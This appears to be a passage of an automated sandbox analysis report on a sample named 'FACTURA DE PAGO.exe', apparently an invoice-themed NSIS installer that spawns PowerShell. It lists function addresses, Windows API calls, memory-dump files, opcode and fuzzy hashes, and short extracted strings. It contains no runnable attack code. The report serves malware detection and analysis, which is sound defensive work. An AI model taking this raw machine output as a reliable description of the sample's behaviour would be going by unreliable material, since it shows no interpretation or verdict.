Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD

Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
GetTickCount.KERNEL32 ref: 00402C33
CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
ShowWindow.USER32(00000000,00000005), ref: 00402C5E

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D

Function 0040588F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Trehagen Setup,NSIS Error), ref: 00405D3C

Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861

lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3081826266
Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E

Function 0040361A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
GlobalFree.KERNEL32(00000000), ref: 0040363B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC

Function 004057E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA DE PAGO.exe,C:\Users\user\Desktop\FACTURA DE PAGO.exe,80000000,00000003), ref: 004057EE
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA DE PAGO.exe,C:\Users\user\Desktop\FACTURA DE PAGO.exe,80000000,00000003), ref: 004057FC

Strings

C:\Users\user\Desktop, xrefs: 004057E8

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD

Function 00405907 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9

Analysis Process: powershell.exePID: 7460, Parent PID: 7436COMMON

Executed Functions

Function 00BCE260 Relevance: .7, Instructions: 669COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1896529515.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 568c0eb38d8e4a976d544a13c5f944362fec100f38f3812ebe015c91f237023d
Instruction ID: d856bc454682181fcd670ee864b84dec6cd26b58e941cc0f48620d7a980f6624
Opcode Fuzzy Hash: 568c0eb38d8e4a976d544a13c5f944362fec100f38f3812ebe015c91f237023d
Instruction Fuzzy Hash: 7C525C34A00319DFDB25DB64C894BADBBF2EF84344F1485AAD81AA7251EB30DD86CB51

Function 07273D10 Relevance: 26.0, Strings: 20, Instructions: 1038COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07274173
4'^q, xrefs: 07273ED0
4'^q, xrefs: 0727435F
4'^q, xrefs: 072742B7
4'^q, xrefs: 072748E5
4'^q, xrefs: 0727436B
4'^q, xrefs: 072742C3
4'^q, xrefs: 07273F84
4'^q, xrefs: 0727421B
4'^q, xrefs: 07274677
4'^q, xrefs: 07273E1E
4'^q, xrefs: 07274020
4'^q, xrefs: 0727402C
4'^q, xrefs: 07274167
4'^q, xrefs: 0727420F
4'^q, xrefs: 07273E12
4'^q, xrefs: 0727466B
4'^q, xrefs: 07273EDC
4'^q, xrefs: 072748D9
4'^q, xrefs: 07273F78

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-3098030321
Opcode ID: d0c83154d62ed1139083d592442368815c5492ca9fb700b085ffbf8b41104515
Instruction ID: 4062efe56f42f2815e850f3eee70750927e65cd66013735b758a5ab9b6022b1a
Opcode Fuzzy Hash: d0c83154d62ed1139083d592442368815c5492ca9fb700b085ffbf8b41104515
Instruction Fuzzy Hash: 7E92ABB0B10309DFC714DB98C551F9ABBA2BF85304F608569D908AF755CBB2EC86CB91

Function 08BD06F0 Relevance: 19.4, Strings: 15, Instructions: 687COMMON

Download Yara Rule

Strings

$^q, xrefs: 08BD0B3C
4'^q, xrefs: 08BD0A1E
tP^q, xrefs: 08BD0B94
$^q, xrefs: 08BD07C7
4'^q, xrefs: 08BD0825
4'^q, xrefs: 08BD0831
$^q, xrefs: 08BD0AF8
$^q, xrefs: 08BD0B4F
4'^q, xrefs: 08BD0A12
$^q, xrefs: 08BD0B14
$^q, xrefs: 08BD07B7
$^q, xrefs: 08BD0B30
tP^q, xrefs: 08BD0BA0
$^q, xrefs: 08BD0796
$^q, xrefs: 08BD0B5B

Memory Dump Source

Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1262107880
Opcode ID: d8e8eab5543c7c46c9bee3c903336929a42d5ce32349a867bbfa8ab6e616333d
Instruction ID: 8928b8b1790beede572c9adfe172ff84c1231bb226c8d3053ee6751b64fd132f
Opcode Fuzzy Hash: d8e8eab5543c7c46c9bee3c903336929a42d5ce32349a867bbfa8ab6e616333d
Instruction Fuzzy Hash: D532C671B04708EFCB14EF68C445AAABBE2EF84311F1484AAD8059F755EB32DD46CB91

Function 07273CFD Relevance: 13.3, Strings: 10, Instructions: 830COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07274167
4'^q, xrefs: 07274020
4'^q, xrefs: 07273ED0
4'^q, xrefs: 0727466B
4'^q, xrefs: 0727420F
4'^q, xrefs: 07273E12
4'^q, xrefs: 0727435F
4'^q, xrefs: 072742B7
4'^q, xrefs: 072748D9
4'^q, xrefs: 07273F78

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-518715366
Opcode ID: 882e5245ced19fde0eb8b24cd1dc0a7f1cbd96fb3d8a1e265d917816f7578b4d
Instruction ID: c726af04cb76f18e6230731c062a5ffaaf3a824b34d05b5b4839864cb31d9701
Opcode Fuzzy Hash: 882e5245ced19fde0eb8b24cd1dc0a7f1cbd96fb3d8a1e265d917816f7578b4d
Instruction Fuzzy Hash: 627299B0A10345DFC710DB94C991F9ABBB2BF95304F648558D9086F792CBB2EC86CB91

Function 07271148 Relevance: 8.1, Strings: 6, Instructions: 596COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072714C2
tP^q, xrefs: 072711DF
4'^q, xrefs: 072714B6
4'^q, xrefs: 07271744
4'^q, xrefs: 07271738
tP^q, xrefs: 072711D3

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
API String ID: 0-445857065
Opcode ID: abffd8c9e6e10dc3798d6cb61758768889fd6ac97cac899f4bdaae11489d3e38
Instruction ID: 811d9f25fcde42614fc582682f05a894ef777a3528fc55455acf7bb8ab5f442b
Opcode Fuzzy Hash: abffd8c9e6e10dc3798d6cb61758768889fd6ac97cac899f4bdaae11489d3e38
Instruction Fuzzy Hash: 1C32CFB0B112099FD714CB98CA51FAABBF2AFC9314F148469E805AF751CB72EC45CB91

Function 08BD2CB0 Relevance: 6.6, Strings: 5, Instructions: 301COMMON

Download Yara Rule

Strings

4'^q, xrefs: 08BD2D9B
4'^q, xrefs: 08BD2D8F
$^q, xrefs: 08BD2D67
$^q, xrefs: 08BD2D73
$^q, xrefs: 08BD2D4B

Memory Dump Source

Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 9f43b7e7b8eddff4d463386438bfe30be44f70ab974642d68b2f755ca588243a
Instruction ID: fb875ca845173d40a8279d88cd53f313a51ba0be95d75b19bcd0b4f88160b086
Opcode Fuzzy Hash: 9f43b7e7b8eddff4d463386438bfe30be44f70ab974642d68b2f755ca588243a
Instruction Fuzzy Hash: 27A1D531B04349EFCB249F69C44466ABBE2FF88312F1484EEE515CB265EB31D945CBA1

Function 07270840 Relevance: 6.5, Strings: 5, Instructions: 235COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072708D4
$^q, xrefs: 072708AF
$^q, xrefs: 072708BB
4'^q, xrefs: 072708E0
$^q, xrefs: 07270893

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: ece80b56e8e5f93a5ab89d668f810b9059031e0e8fe172bbd25b693ce0a68cc7
Instruction ID: bed70bf84deaffd39c6c3cedc8eb30bd99df5b13accc5944c69d559e4e17d09d
Opcode Fuzzy Hash: ece80b56e8e5f93a5ab89d668f810b9059031e0e8fe172bbd25b693ce0a68cc7
Instruction Fuzzy Hash: 697139B1B2021ACFCB349B79CA002ABBBA5EFC5610F14847AD905DB355DA31DA49C7E1

Function 07274D70 Relevance: 5.7, Strings: 4, Instructions: 708COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072754C6
$^q, xrefs: 07275BEE
4'^q, xrefs: 072754BA
$^q, xrefs: 07275BFA

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: b1b61d75f2508e85497d768307bad3adac93973331bb26dd27f8de3b3184dbc3
Instruction ID: cc2f71e2542b77f49a9de5588740e97807e76291df11afe58ac9d138bdd1d34c
Opcode Fuzzy Hash: b1b61d75f2508e85497d768307bad3adac93973331bb26dd27f8de3b3184dbc3
Instruction Fuzzy Hash: 06628BB4A10219DFDB14DB58C941FAABBB2BB88304F10C499D908AF755CB72ED85CF91

Function 07278308 Relevance: 5.4, Strings: 4, Instructions: 445COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07278646
4'^q, xrefs: 072787D6
4'^q, xrefs: 072787E0
4'^q, xrefs: 07278650

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 78cbb70ebbec46720455335584ff3974b2abc6d14dbe43893ce058fb017b80a4
Instruction ID: 2eef6ae29106c0e5b6922b63b115774fd8fdc7e983a3cae245b1c426c93a7052
Opcode Fuzzy Hash: 78cbb70ebbec46720455335584ff3974b2abc6d14dbe43893ce058fb017b80a4
Instruction Fuzzy Hash: 71E15AF1B2421B8FCB148B688A096ABBBE2AFC5314F14C47AD505CF755DB31C985C7A2

Function 072733F8 Relevance: 5.4, Strings: 4, Instructions: 373COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0727378C
4'^q, xrefs: 07273701
4'^q, xrefs: 07273780
4'^q, xrefs: 0727370D

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: eefa8e9aa4c0ff0228dadfa5eb20b8879b90eb8dfb4c964f5329a222e0bc91ba
Instruction ID: fe294ff3d5251466c007378bf89bf4182880f4ff13bc52263d20d4239f6a923a
Opcode Fuzzy Hash: eefa8e9aa4c0ff0228dadfa5eb20b8879b90eb8dfb4c964f5329a222e0bc91ba
Instruction Fuzzy Hash: 1DE1B1B0B1024ADFCB04DB68CA51B9EBBA3AF88304F15C569D4056F796CB71DC4ACB91

Function 08BD2C95 Relevance: 3.9, Strings: 3, Instructions: 106COMMON

Download Yara Rule

Strings

4'^q, xrefs: 08BD2D8F
$^q, xrefs: 08BD2D67
$^q, xrefs: 08BD2D4B

Memory Dump Source

Source File: 00000001.00000002.1914509095.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8bd0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: b56dfa182a900dae3c534c37d4bd8cf938ba935cc16c5df09a90b68f9fbd2f44
Instruction ID: 00a53cfe673af252003a2339773f2a28935928769ef24dc18d0ce764847cfbce
Opcode Fuzzy Hash: b56dfa182a900dae3c534c37d4bd8cf938ba935cc16c5df09a90b68f9fbd2f44
Instruction Fuzzy Hash: 8031C334A053C5EFDB398E25C4446667BB1EF52613B0881FFC8288B165F775E84ACBA1

Function 07271020 Relevance: 3.8, Strings: 3, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 0727107C
$^q, xrefs: 07271032
$^q, xrefs: 07271088

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: bd59d553a0f0120055f74b689260232c6292694b9f44a2fb0d12acd628faa964
Instruction ID: 3800d44b10ab9e3920111d77d6b824e5b4a4594aa30f0abf4f9fb9fcb053d581
Opcode Fuzzy Hash: bd59d553a0f0120055f74b689260232c6292694b9f44a2fb0d12acd628faa964
Instruction Fuzzy Hash: 722155B133024F9BDB34456A8A11B23AADADFC5712F34882AE909CB385CD72C858C361

Function 0727C990 Relevance: 3.0, Strings: 2, Instructions: 503COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0727CE7D
4'^q, xrefs: 0727CE89

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: d14945598c6fc8446081104eec7b1bb14490e0b7c1e43d5379cbbf68a1497fff
Instruction ID: edcb5da08cdd4c3be729c1e2a865e00616dc54245adb7231b371f65ef145fc7a
Opcode Fuzzy Hash: d14945598c6fc8446081104eec7b1bb14490e0b7c1e43d5379cbbf68a1497fff
Instruction Fuzzy Hash: 2C227EB0B002189FC715DB18CD51F9ABBA2EB89304F5085D9D909AF791CB72ED86CF91

Function 0727127E Relevance: 2.9, Strings: 2, Instructions: 419COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072714B6
4'^q, xrefs: 07271738

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 03e1237d94200d35da7d83b479a889277dccada2bf8193e7ffb920a40086f0de
Instruction ID: dcb0feeb8f7a242a3ea5e27eea9c0dc664e3cbe7b4ba58c8c2bacb9e75878d09
Opcode Fuzzy Hash: 03e1237d94200d35da7d83b479a889277dccada2bf8193e7ffb920a40086f0de
Instruction Fuzzy Hash: 530289B0B1120AEFD714CB98C581FA9BBF2BF89314F548469E805AB751C772EC45CB91

Function 07271280 Relevance: 2.9, Strings: 2, Instructions: 417COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072714B6
4'^q, xrefs: 07271738

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: cf90edb62e5725dbe7d304c186b8ca312eaea2f26e665b36116baf1bb3231fff
Instruction ID: a9ed32730012cd318c142c74a62f94642736834eee0ed5dba3e1a9729842fc69
Opcode Fuzzy Hash: cf90edb62e5725dbe7d304c186b8ca312eaea2f26e665b36116baf1bb3231fff
Instruction Fuzzy Hash: D40288B0B1120AEFD714CB98C581FAABBF2BF89314F548469E805AB751C772EC45CB91

Function 072733E3 Relevance: 2.8, Strings: 2, Instructions: 319COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07273701
4'^q, xrefs: 07273780

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 8b121ee38c7fa015c6c1d5ecddbc701789ff95d7ebf703c536fcab10b8a220fe
Instruction ID: be2e8a5a8575ee3c6107d91b2d217b8074c19820b0af4c1adbbdfd29f6012bcd
Opcode Fuzzy Hash: 8b121ee38c7fa015c6c1d5ecddbc701789ff95d7ebf703c536fcab10b8a220fe
Instruction Fuzzy Hash: 5CC1D2B0A1024ADFCB14CB58CA41F9EBBB2AF89304F15C569D9056F756CB31EC46CB91

Function 07271000 Relevance: 2.6, Strings: 2, Instructions: 84COMMON

Download Yara Rule

Strings

$^q, xrefs: 0727107C
$^q, xrefs: 07271032

Memory Dump Source

Source File: 00000001.00000002.1909756260.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_powershell.jbxd

Similarity

API ID:
